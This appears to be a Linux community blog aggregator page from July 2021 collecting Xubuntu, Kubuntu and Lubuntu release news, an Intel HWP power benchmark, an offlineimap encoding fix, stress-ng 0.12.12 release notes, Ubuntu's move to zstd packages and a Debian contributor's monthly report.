Disks is an all-in-one utility for managing storage devices. Its feature list is expansive, but some key features include:

  • Create and restore disk images (including flashing ISOs to thumb drives)
  • Partition and format disks, with encryption support
  • Inspect drive speed and health
  • Edit mounting rules (basically a user-friendly fstab editor)
GNOME Disks makes managing your storage a lot easier. Never manually edit fstab again.


Rhythmbox is a music playing and library application. It supports local files and audio streams, and includes a radio browser to find online radio stations. In Xubuntu, we're currently using the default layout (see left screenshot), but members of the community have proposed using the Alternative Toolbar plugin. Which do you prefer? Vote in the Twitter poll!

Clipman (xfce4-clipman-plugin)

Clipman is a clipboard management application and plugin. It keeps a history of text and images copied to the clipboard and allows you to paste it later. Clipboard history can also be searched with the included xfce4-clipman-history command.

Clipman remembers your clipboard history and makes it easy to paste later.



Pidgin is a multi-client chat program that has been included in Xubuntu since the beginning, when it was known as Gaim. In recent years, as chat services have moved to proprietary and locked down protocols, Pidgin has become less and less useful, leading to its removal in Xubuntu. If you want to install Pidgin on your system, it can be found on GNOME Software.

If you're still using Pidgin, you can easily find and install it from GNOME Software.

Active Team Votes


We've got an active team vote to add two new themes to our seed. The themes in question are Arc and Numix Blue.

The Arc theme is a series of flat themes with transparent elements. It includes both light and dark themes with support for numerous desktop environments and applications.

Numix Blue is a blue variation of the Numix theme already included in Xubuntu. It's an unofficial fork with some graphical differences besides the switch to a blue accent color.

Clipman by Default

Since we added Clipman to Xubuntu, we now have a second vote for including it in the panel by default. This would automatically enable Clipman's clipboard management, which I'm personally opposed to. For my use case, I frequently copy sensitive strings to the clipboard, and I don't want them to be saved or displayed anywhere. New users would have no idea the clipboard monitor is even running.

Process Updates

Xubuntu Seed

Because our seed is also updated by Ubuntu maintainers, it is important that the code continues to be hosted on Launchpad. The @Xubuntu/xubuntu-seed code is mirrored from Launchpad every few hours. To help reduce the friction between the two systems, I made some small improvements.

Issues are now synced from Launchpad for the xubuntu-meta source package. I found a solution by the Yaru team for syncing the issues using GitHub actions. Our syncing scripts run daily, syncing both newly created issues and issues that have been closed out.

I've also added a GitHub action to prevent pull requests on our mirror repository. Since the repository is a mirror, pull requests are not actionable on GitHub. This action automatically closes those pull requests with a comment pointing the contributor in the right direction.

What's Next?

Votes are ongoing, and there's a lot of activity in the Ubuntu space. GNOME 40 and GTK 4 are starting to land, so there's a strong likelihood that GTK 4 components will make their way into Xubuntu. This means we'll now have 3 versions of the toolkit, thanks to GIMP and Hexchat (GTK 2), Xfce (GTK 3), and GNOME 40 (GTK 4). Hopefully we'll see a stable GIMP 3.0 release soon so we can free up some space.

There are some important dates coming soon in the Impish Indri Release Schedule. August 19 marks Feature Freeze, so the outstanding team votes and new feature requests should be settled soon. A couple of weeks later, we have the User Interface Freeze on September 9. Let's keep Xubuntu development rolling forward!

Post photo by Adriel Kloppenburg on Unsplash

on July 29, 2021 11:06 AM

July 25, 2021

Kubuntu Groovy Gorilla was released on October 22nd, 2020 with 9 months support.

As of July 22nd, 2021, 20.10 reached ‘end of life’.

No more package updates will be accepted to 20.10, and it will be archived to in the coming weeks.

The official end of life announcement for Ubuntu as a whole can be found here [1].

Kubuntu 20.04 Focal Fossa and 21.04 Hirsute Hippo continue to be supported.

Users of 20.10 can follow the Kubuntu 20.10 to 21.04 Upgrade [2] instructions.

Should for some reason your upgrade be delayed, and you find that the 20.10 repositories have been archived to, instructions to perform an EOL Upgrade can be found on the Ubuntu wiki [3].

Thank you for using Kubuntu 20.10 Groovy Gorilla.

The Kubuntu team.

[1] –
[2] –
[3] –

on July 25, 2021 01:47 PM

July 24, 2021

Intel Hardware P-State (aka Hardware Controlled Performance or "Speed Shift") (HWP) is a feature found in more modern x86 Intel CPUs (Skylake onwards). It attempts to select the best CPU frequency and voltage to match the optimal power efficiency for the desired CPU performance.  HWP is more responsive than the older operating system controlled methods and should therefore be more effective.

To test this theory, I exercised my Lenovo T480 i5-8350U 8 thread CPU laptop with the stress-ng cpu stressor using the "double" precision math stress method, exercising 1 to 8 of the CPU threads over a 60 second test run.  The average CPU temperature and average CPU frequency were measured using powerstat and the CPU compute throughput was measured using the stress-ng bogo-ops count.

The HWP mode was set using the x86_energy_perf_policy tool (as found in the Linux source in tools/power/x86/x86_energy_perf_policy).  This allows one to select one of 5 policies:  "normal", "performance", "balance-performance", "balance-power" and "power" as well as enabling or disabling turbo frequencies.  For the tests, turbo mode was also enabled to allow the CPU to run at higher CPU turbo frequencies.

The "performance" policy is the least efficient option as the CPU is clocked at a high frequency even when the system is idle, and is not ideal for a laptop. The "power" policy will optimize for low power; on my system it set the CPU to a maximum of 400MHz, which is not ideal for typical uses.

The more useful "balance-performance" option optimizes for good throughput at the cost of power consumption, whereas the "balance-power" option optimizes for good power consumption in preference to performance, so I tested these two options.

Comparison #1,  CPU throughput (bogo-ops) vs CPU frequency.

The two HWP policies are almost identical in CPU bogo-ops throughput vs CPU frequency. This is hardly surprising - the compute throughput for math intensive operations should scale with CPU clock frequency. Note that 5 or more CPU threads sees a reduction in compute throughput because the CPU hyper-threads are being used.

Comparison #2, CPU package temperature vs CPU threads used.

Not a big surprise, the more CPU threads being exercised the hotter the CPU package will get. The balance-power policy shows a cooler running CPU than the balance-performance policy.  The balance-performance policy is running hot even when one or a few threads are being used.

Comparison #3, Power consumed vs CPU threads used.

Clearly the balance-performance option is consuming more power than balance-power; this matches the CPU temperature measurements too. More power, higher temperature.

Comparison #4, Maximum CPU frequency vs CPU threads used.

With the balance-performance option, the average maximum CPU frequency drops as more CPU threads are used.  Intel turbo boost allows a few CPUs to be clocked at higher frequencies; exercising more CPUs draws more power and hence generates more heat. To keep the CPU package from hitting thermal overrun, CPU frequency and voltage have to be scaled down when using more CPUs.

This is also true (but far less pronounced) for the balance-power option. As one can see, balance-performance runs the CPU at a much higher frequency, which is great for compute at the expense of power consumption and heat.

Comparison #5, Compute throughput vs power consumed.

So running with balance-performance clocks the CPU at a higher speed, and hence one gets more compute throughput per unit of time compared to the balance-power mode.  That's great if your laptop is plugged into the mains and you want some compute-intensive tasks performed quickly.   However, is this more efficient?

Comparing the amount of compute performance with the power consumed shows that the balance-power option is more efficient than balance-performance.  Basically with balance-power more compute is possible with the same amount of energy compared to balance-performance, but it will take longer to complete.

CPU frequency scaling over time

The 60 second duration tests were long enough for the CPU to warm up enough to reach thermal limits, causing HWP to throttle back the voltage and CPU frequencies.  The following graphs illustrate how running with the balance-performance option allows the CPU to run for several seconds at a high turbo frequency before it hits a thermal limit, after which the CPU frequency and power are adjusted to avoid thermal overrun:


After 8 seconds the CPU package reached 92 degrees C and then CPU frequency scaling kicks in:

...and power consumption drops too. It is interesting to note that we can only run for ~9 seconds before the CPU is scaled back to around the same CPU frequency that the balance-power option allows.


Running with HWP balance-power option is a good default choice for maximizing compute while minimizing power consumption for a modern Intel based laptop.  If one wants to crank up the performance at the expense of battery life, then the balance-performance option is most useful.

Using the balance-performance option when a laptop is plugged into the mains (e.g. via a base-station) may seem like a good idea for peak compute performance. Note that this may not help in the long term, as the CPU frequency may drop back to avoid thermal overrun.  However, for bursty, infrequent, demanding CPU uses this may be a good choice.  I personally refrain from using it as it makes my CPU run rather hot, and it's less efficient, so it's not ideal for reducing my carbon footprint.

Laptop manufacturers normally set the default HWP option to "balance-power", but this may be changed in the BIOS settings (look for power balance, HWP or Speed Shift options) or with the x86_energy_perf_policy tool (found in the linux-tools-generic package in Ubuntu).

on July 24, 2021 10:59 PM

July 16, 2021

One of the things I really love about working at Influx Data is the strong social focus for employees. We’re all remote workers, and the teams have strategies to enable us to connect better. One of those ways is via Chess Tournaments! I haven’t played chess for 20 years or more, and was never really any good at it. I know the basic moves, and can sustain a game, but I’m not a chess strategy guru, and don’t know all the best plays.
on July 16, 2021 11:00 AM

July 10, 2021

Lubuntu 20.10 (Groovy Gorilla) was released October 22, 2020 and will reach End of Life on Thursday, July 22, 2021. This means that after that date there will be no further security updates or bugfixes released. We highly recommend that you update to 21.04 as soon as possible if you are still running 20.10. After […]
on July 10, 2021 09:12 PM

offlineimap - unicode decode errors

Sebastian Schauenburg

My main system is currently running Ubuntu 21.04. For e-mail I'm relying on neomutt together with offlineimap, both of which are amazing tools. Recently offlineimap was updated/moved to offlineimap3. On my system, offlineimap reports itself as OfflineIMAP 7.3.0 and dpkg tells me it is version 0.0~git20210218.76c7a72+dfsg-1.

Unicode Decode Error problem

Today I noticed several errors in my offlineimap sync log. Basically the errors looked like this:

UnicodeDecodeError: 'utf-8' codec can't decode byte 0xfc in position 1299: invalid start byte
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xeb in position 1405: invalid continuation byte


If you encounter it as well (and you use mutt or neomutt), please have a look at this great comment on Github from Joseph Ishac (jishac) since his tip solved the issue for me.

To "fix" this issue for future emails, I modified my .neomuttrc and commented out the default send encoding charset and omitted the iso-8859-1 part:

#set send_charset = "us-ascii:iso-8859-1:utf-8"
set send_charset = "us-ascii:utf-8"

Then I looked through the email files on the filesystem and identified the ISO-8859 encoded emails in the Sent folder which are causing the current issues:

$ file * | grep "ISO-8859"
1520672060_0.1326046.desktop,U=65,FMD5=7f8c0215f16ad5caed8e632086b81b9c:2,S: ISO-8859 text, with very long lines
1521626089_0.43762.desktop,U=74,FMD5=7f8c02831a692adaed8e632086b81b9c:2,S:   ISO-8859 text
1525607314.R13283589178011616624.desktop:2,S:                                ISO-8859 text

That left me with opening the files with vim and saving them with the correct encoding:

:set fileencoding=utf8

Voila, mission accomplished:

$ file * | grep "UTF-8"
1520672060_0.1326046.desktop,U=65,FMD5=7f8c0215f16ad5caed8e632086b81b9c:2,S: UTF-8 Unicode text, with very long lines
1521626089_0.43762.desktop,U=74,FMD5=7f8c02831a692adaed8e632086b81b9c:2,S:   UTF-8 Unicode text
1525607314.R13283589178011616624.desktop:2,S:                                UTF-8 Unicode text
on July 10, 2021 02:00 PM

July 09, 2021

The release of stress-ng 0.12.12 incorporates some useful features and a handful of new stressors.

Media devices such as HDDs and SSDs normally support Self-Monitoring, Analysis and Reporting Technology (S.M.A.R.T.) to detect and report various measurements of drive reliability.  To complement the various file system and I/O stressors, stress-ng now has a --smart option that checks for any changes in the S.M.A.R.T. measurements and will report these at the end of a stress run. In one example run, the reported measurements showed errors on /dev/sdc, which explained why that ZFS pool was having performance issues.
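
The exact invocation isn't reproduced above; a plausible example (my sketch, not the original post's command) that exercises a disk and reports S.M.A.R.T. deltas would be:

$ sudo stress-ng --hdd 4 --smart -t 60

(sudo is needed because reading S.M.A.R.T. data requires raw access to the block device.)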

For x86 CPUs I have added a new stressor that triggers System Management Interrupts via writes to port 0xb2 to force the CPU into System Management Mode in ring -2. The --smi stressor option will also measure the time taken to service the SMI. To run this stressor, one needs the --pathological option, since SMIs behave like non-maskable interrupts and may hang the computer:
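
For example (a sketch; the original post's exact command isn't reproduced here):

$ sudo stress-ng --smi 0 --pathological -t 60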

To exercise the munmap(2) system call a new munmap stressor has been added. This creates child processes that walk through their memory mappings from /proc/$pid/maps and unmap pages of libraries that are not being used. The unmapping strides across each mapping in prime-sized multiples of the page size, punching many holes in the mapping to exercise the VM mapping structures. These unmappings can generate SIGSEGV segmentation faults that are silently handled by respawning a new child stressor. Example:
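
A plausible invocation (my sketch, not the original post's command):

$ stress-ng --munmap 4 -t 60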


There are some new options for the fork, vfork and vforkmany stressors: a new vm mode has been added to exercise virtual memory mappings. This enables detrimental-performance virtual memory advice using madvise on all pages of the new child process. Where possible this will try to mark every page in the new process with the madvise MADV_MERGEABLE, MADV_WILLNEED, MADV_HUGEPAGE and MADV_RANDOM flags.  The following shows how to enable the vm options for the fork and vfork stressors:
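
For example (a sketch; the --fork-vm and --vfork-vm option names are as I understand them for 0.12.12, so verify against your version's manual):

$ stress-ng --fork 4 --fork-vm --vfork 4 --vfork-vm -t 60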

One final new feature is the --skip-silent option.  This disables the printing of messages when a stressor is skipped, for example when the stressor is not supported by the kernel or the hardware, or when a support library is not available.
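
For example, running one instance of every stressor briefly without any skip messages (again a sketch, not the original post's command):

$ stress-ng --all 1 -t 10 --skip-silent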

As usual for each release, stress-ng incorporates bug fixes and has been tested on a wide variety of Linux/*BSD/UNIX/POSIX systems and across a range of processor architectures (arm32, arm64, amd64, i386, ppc64el, RISC-V, s390x, sparc64, m68k).  It has also been statically analysed with Coverity and cppcheck, and builds cleanly with pedantic build flags on gcc and clang.



on July 09, 2021 10:15 AM

July 08, 2021

Preamble

I recently started working for InfluxData as a Developer Advocate on Telegraf, an open source server agent for collecting metrics. Telegraf builds from source to ship as a single Go binary. The latest release, 1.19.1, came out just yesterday. Part of my job involves helping users by reproducing reported issues, and assisting developers by testing their pull requests. It’s fun stuff, I love it. Telegraf has an extensive set of plugins which support gathering, aggregating & processing metrics, and sending the results to other systems.
on July 08, 2021 11:00 AM

July 05, 2021

When Julian Andres Klode and I added initial Zstandard compression support to Ubuntu’s APT and dpkg in Ubuntu 18.04 LTS, we planned to get the changes accepted into Debian quickly and make Ubuntu 18.10 the first release where the new compression could speed up package installations and upgrades. Well, it took slightly longer than that.

Since then many other packages have been updated to support zstd compressed packages and read-only compression has been back-ported to the 16.04 Xenial LTS release, too, on Ubuntu’s side. In Debian, zstd support is available now in APT, debootstrap and reprepro (thanks Dimitri!). It is still under review for inclusion in Debian’s dpkg (BTS bug 892664).

Given that there is sufficient archive-wide support for zstd, Ubuntu is switching to zstd compressed packages in Ubuntu 21.10, the current development release. Please welcome hello/2.10-2ubuntu3, the first zstd-compressed Ubuntu package, which will be followed by many others built with dpkg (>= 1.20.9ubuntu2), and enjoy the speed!

on July 05, 2021 06:26 PM

June 30, 2021

Here’s my (twenty-first) monthly but brief update about the activities I’ve done in the F/L/OSS world.


This was my 30th month of actively contributing to Debian. I became a DM in late March 2019 and a DD on Christmas ‘19! \o/

However, this wasn’t really a good month for mental health. And so apparently less work, but still more than nothing, heh. :D

As a side note, this month, I spent a lot of time on Clubhouse, the new social audio app, at least in India. (I am sure you’d have heard?) Anyway, I made some friends there; more on that later, maybe? (ik, I say that a lot, but ugh, I’ll get to it!)

Anyway, I did the following stuff in Debian:

Uploads and bug fixes:

Other $things:

  • Mentoring for newcomers.
  • Moderation of -project mailing list.


This was my 5th month of actively contributing to Ubuntu. Now that I’ve joined Canonical to work on Ubuntu full-time, there’s a bunch of things I do! \o/

This month, again, was dedicated to PHP 8.0, transitioning from PHP 7.4 to 8.0. And finally, Bryce and I were able to complete the transition! \o/

This month, I also became an Ubuntu Core Developer. :D I’ll write about it sometime; lol, yet another promise. Heh.

That said, the things that I mostly worked on are:

Uploads & Syncs:

+1 Maintenance:

  • Shadowed Christian Ehrhardt on his +1. My report here.
    • Added hints for schleuder; MP #404025.
    • Fixed ruby-httpclient via 2.8.3-3 in Debian.
    • Requested removal of ruby-gitlab-pg-query from Impish (-proposed) - LP: #1931257.
    • Re-triggered python-django-debug-toolbar/1:3.2.1-1 for amd64 and it passed & migrated.
    • Fixed ruby-rails-html-sanitizer via 1.3.0-2 in Debian to make it work with newer API of ruby-loofah.
    • Re-triggered ruby-stackprof with glibc as triggers on amd64; it passed & unblocked glibc.
    • Re-triggered ruby-ferret with glibc as triggers on amd64; it passed & unblocked glibc.
    • Re-triggered ruby-hiredis with glibc as triggers on armhf; it passed & unblocked glibc.
    • Added hints for ruby-excon on s390x; MP #404113.

Seed Operations:

  • [2021-06-01] MP #403562/prips for Impish - MP: #403562.
    • [2021-06-02] MP #403602/prips for Hirsute - MP: #403602.
    • [2021-06-02] MP #403603/prips for Groovy - MP: #403603.
    • [2021-06-02] MP #403604/prips for Focal - MP: #403604.
    • [2021-06-02] MP #403605/prips for Bionic - MP: #403605.
  • [2021-06-17] MP #404326/python-aws-requests-auth for Impish - MP #404326.
    • [2021-06-22] MP #404489/python-aws-requests-auth for Hirsute - MP #404489.
    • [2021-06-22] MP #404490/python-aws-requests-auth for Groovy - MP #404490.
    • [2021-06-22] MP #404491/python-aws-requests-auth for Focal - MP #404491.
    • [2021-06-22] MP #404492/python-aws-requests-auth for Bionic - MP #404492.

Bug Triages:

Debian (E)LTS

Debian Long Term Support (LTS) is a project to extend the lifetime of all Debian stable releases to (at least) 5 years. Debian LTS is not handled by the Debian security team, but by a separate group of volunteers and companies interested in making it a success.

And Debian Extended LTS (ELTS) is its sister project, extending support to the Jessie release (+2 years after LTS support).

This was my twenty-first month as a Debian LTS and eleventh month as a Debian ELTS paid contributor.
I was assigned 40.00 hours for LTS and 40.00 hours for ELTS and worked on the following things:

LTS CVE Fixes and Announcements:

ELTS CVE Fixes and Announcements:

Other (E)LTS Work:

  • Front-desk duty from 28-06 until 04-07 for both LTS and ELTS.
  • Triaged rails, nginx, eterm, mrxvt, rxvt, ieee-data, cloud-init, intel-microcode, htmldoc, djvulibre, composer, and curl.
  • Marked CVE-2021-30535/icu as not-affected for stretch.
  • Marked CVE-2017-7483 as fixed via the +deb9u2 upload.
  • Auto EOL’ed unrar-nonfree, darktable, mruby, htslib, ndpi, dcraw, libspring-security-2.0-java, rabbitmq-server, and linux for jessie.
  • [LTS] Discussed ieee-data’s fix for LTS. Thread here.
  • [ELTS] Discussed cloud-init’s logs w/ Raphael and asked for a rebuild.
  • [(E)LTS] Discussed intel-microcode’s status w/ the maintainer and tracked regressions, et al.
  • [(E)LTS] Discussed htmldoc’s situation, the upgrade problems, and prepped a fix for that.
  • Attended monthly Debian LTS meeting.
  • Answered questions (& discussions) on IRC (#debian-lts and #debian-elts).
  • General and other discussions on LTS private and public mailing list.

Until next time.
:wq for today.

on June 30, 2021 08:40 PM